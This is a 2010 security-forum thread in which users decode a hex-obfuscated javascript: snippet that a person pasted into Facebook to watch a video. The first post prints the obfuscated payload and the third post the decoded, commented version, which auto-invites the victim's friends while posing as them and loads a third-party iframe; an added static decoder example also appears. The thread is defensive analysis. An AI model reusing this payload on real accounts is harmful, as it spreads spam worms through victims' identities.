Help needed from a java expert...


5 replies to this topic

#1 shaamoney

shaamoney

  • Members
  • 49 posts

Posted 19 April 2010 - 04:49 PM

A buddy of mine tried to watch a video through Facebook and he loaded the following code - does anyone have any idea what it does?

java script:var _0x1af0=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x31\x30\x36\x34\x35\x36\x32\x32\x32\x37\x32\x38\x36\x31\x37\x5F\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x34\x31\x33\x38\x37\x35\x35\x32\x37\x37\x31\x36\x39\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x62\x72\x6F\x75\x67\x68\x74\x74\x6F\x79\x6F\x75\x2E\x6E\x65\x74\x2F\x70\x72\x61\x6E\x6B\x63\x61\x6C\x6C\x32\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x30\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22
\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0x1af0[0],_0x1af0[1],_0x1af0[2],_0x1af0[3],_0x1af0[4],_0x1af0[5],_0x
1af0[6],_0x1af0[7],_0x1af0[8],_0x1af0[9],_0x1af0[10],_0x1af0[11],_0x1af0[12],_0x
1af0[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]]; void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0x1af0[14]);

Thanks!

(Admin - please feel free to delete my other post in "general" - thanks)



#2 groovicus

groovicus

  • Security Colleague
  • 9,963 posts
  • Gender:Male
  • Location:Centerville, SD

Posted 19 April 2010 - 05:30 PM

Just as a point of clarification, that is Javascript, not Java. They are two completely unrelated languages.

At any rate, it is hexadecimal encoded javascript. The translated code looks something like this (partially):
innerHTMLapp106456222728617_bodygetElementById<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=114138755277169" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>suggestMouseEventscreateEventclickinitEventdispatchEventselect_allsgm_invite_form/ajax/social_graph/invite_dialog.phpsubmitDialog<iframe src="http://broughttoyou.net/prankcall2" style="width: 800px; height: 600px;" frameborder=0 scrolling="no"></iframe>

I don't see much to be worried about, other than it was encoded in the first place.

#3 Andrew

Andrew

    Bleepin' Night Watchman


  • Moderator
  • 8,259 posts
  • Gender:Not Telling
  • Location:Right behind you

Posted 21 April 2010 - 06:50 PM

That code translates to this (with some cleanup by me):

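// Replace the app's container with a "Suggest to Friends" link wired to the invite dialog.
void (document.getElementById("app106456222728617_body").innerHTML="<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=114138755277169\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>");

// Build a synthetic mouse click aimed at that link.
var ss=document.getElementById("suggest");
var c=document.createEvent("MouseEvents");
c.initEvent("click",true,true);

// As in the posted source, dispatchEvent is only referenced here, not called.
void ss.dispatchEvent;
// After 4 seconds, select every entry in the invite dialog (fs is not defined anywhere in the posted script).
void setTimeout(function (){fs.select_all();} ,4000);
// After 5 seconds, submit the invite form.
void setTimeout(function (){SocialGraphManager.submitDialog("sgm_invite_form","/ajax/social_graph/invite_dialog.php");} ,5000);
// Finally, swap the container's content for an iframe that loads the third-party page.
void (document.getElementById("app106456222728617_body").innerHTML="<iframe src=\"http://broughttoyou.net/prankcall2\" style=\"width: 800px; height: 600px;\" frameborder=0 scrolling=\"no\"></iframe>");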

I'm not a Javascript expert, nor a Facebook exploit expert, but that looks very much like it's trying to invite everyone on your friends list (posing as you) to use a particular app.

Edited by Andrew, 21 April 2010 - 06:56 PM.
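
Added example, not part of any post in this thread: a static decoder for the obfuscation style discussed above (a table of `\xNN` strings, an alias table, then bracket lookups). It rewrites text only and never evaluates the input; the names `deobfuscate`, `enc` and `SAMPLE`, and the `example.invalid` URL, are constructed for illustration.

```javascript
// Decode "\xNN" escapes as text; the input is never evaluated.
const unhex = s => s.replace(/\\x([0-9A-Fa-f]{2})/g,
  (_, h) => String.fromCharCode(parseInt(h, 16)));

function deobfuscate(src) {
  const tables = {};
  // 1. String tables: var NAME=["\x..","\x..",...];
  let rest = src.replace(
    /var\s+(\w+)\s*=\s*\[\s*((?:"(?:[^"\\]|\\.)*"[\s,]*)+)\];?/g,
    (_, name, body) => {
      tables[name] = [...body.matchAll(/"((?:[^"\\]|\\.)*)"/g)].map(m => unhex(m[1]));
      return '';
    });
  // 2. Alias tables: var NAME=[OTHER[0],OTHER[1],...];
  rest = rest.replace(
    /var\s+(\w+)\s*=\s*\[\s*((?:\w+\[\d+\][\s,]*)+)\];?/g,
    (_, name, body) => {
      tables[name] = [...body.matchAll(/(\w+)\[(\d+)\]/g)]
        .map(m => (tables[m[1]] || [])[Number(m[2])]);
      return '';
    });
  const names = Object.keys(tables).join('|');
  if (!names) return { code: src.trim(), urls: [], tables };
  // 3. Inline each NAME[n] lookup as a quoted literal, then rewrite
  //    x["ident"] as x.ident so the DOM calls become readable.
  const code = rest
    .replace(new RegExp(`\\b(${names})\\[(\\d+)\\]`, 'g'), (m, n, i) =>
      tables[n][i] === undefined ? m : JSON.stringify(tables[n][i]))
    .replace(/\[\s*"([A-Za-z_$][\w$]*)"\s*\]/g, '.$1')
    .trim();
  // 4. Indicators worth triaging: every URL hidden in the string tables.
  const strings = Object.values(tables).flat().filter(s => typeof s === 'string');
  const urls = [...new Set(strings.flatMap(s => s.match(/https?:\/\/[^\s"'<>]+/g) || []))];
  return { code, urls, tables };
}

// Constructed sample in the shape of the posted snippet (not the real payload).
const enc = s => [...s].map(c =>
  '\\x' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
const SAMPLE =
  `var _0xabc=["${enc('innerHTML')}","${enc('box')}","${enc('getElementById')}",` +
  `"${enc('<iframe src="http://example.invalid/x"></iframe>')}"];` +
  'var v=[_0xabc[0],_0xabc[1],_0xabc[2]];' +
  'void (document[v[2]](v[1])[v[0]]=_0xabc[3]);';
const RESULT = deobfuscate(SAMPLE);
console.log(RESULT.code);
console.log(RESULT.urls);
```

Because the decoder works on text, a suspicious snippet can be pasted into it as a string and read without ever running in a browser session.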


#4 Romeo29

Romeo29

    Learning To Bleep


  • Members
  • 3,194 posts
  • Gender:Not Telling
  • Location:127.0.0.1

Posted 22 April 2010 - 04:20 AM

My 2 cents:

This is typically a malware dropper Javascript behavior:

1. hex encrypted Javascript in social networking site like Facebook
2. Auto sending invite to all your contacts
3. embedding an XSS Iframe

If you use NoScript add-on in Firefox, it should have warned you about XSS.

#5 shaamoney

shaamoney
  • Topic Starter

  • Members
  • 49 posts

Posted 23 April 2010 - 06:36 PM

Thanks for the reply guys, much appreciated.

Is there anything I need to do to counter it? Or is it likely to have little/no effect?

It was for a video clip of a radio show in the US. It was one of those "let's see how many members we can get" groups.

Thanks in advance.

#6 Andrew

Andrew

    Bleepin' Night Watchman


  • Moderator
  • 8,259 posts
  • Gender:Not Telling
  • Location:Right behind you

Posted 24 April 2010 - 01:49 AM

The NoScript addon for Firefox would likely protect against this, as it detects and blocks 99% of XSS exploits.

Other browsers for which there is no NoScript or equivalent would not be protected unless Javascript was turned off altogether.



